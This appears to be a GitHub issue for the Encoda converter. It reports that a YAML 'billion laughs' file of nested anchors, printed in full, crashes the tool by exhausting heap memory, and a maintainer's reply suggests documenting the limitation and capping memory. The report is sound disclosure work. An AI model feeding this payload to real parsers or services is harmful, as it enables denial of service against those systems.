encoda Crash Encoda with YAML Entity Expansion

Crash Encoda with YAML Entity Expansion

Open beneboy opened this issue 5 years ago • 1 comments

$ ./encoda convert lol.yaml -

lol.yaml:

a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

Result:

FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory

Oct 16 '19 21:10 beneboy

Further resources on this:

https://dev.to/efrat19/the-billion-laughs-attack-yaml-anchors-explained-3767
https://github.com/kubernetes/kubernetes/issues/83253

js-yaml does not seem to have an option to deal with this attack. So it seems that the best we can probably do at present is to make a note of it in the src/codecs/yaml/README.md. If running Encoda as a service place limits on memory consumed.

Mar 09 '20 23:03 nokome

encoda encoda copied to clipboard

Crash Encoda with YAML Entity Expansion

encoda
encoda copied to clipboard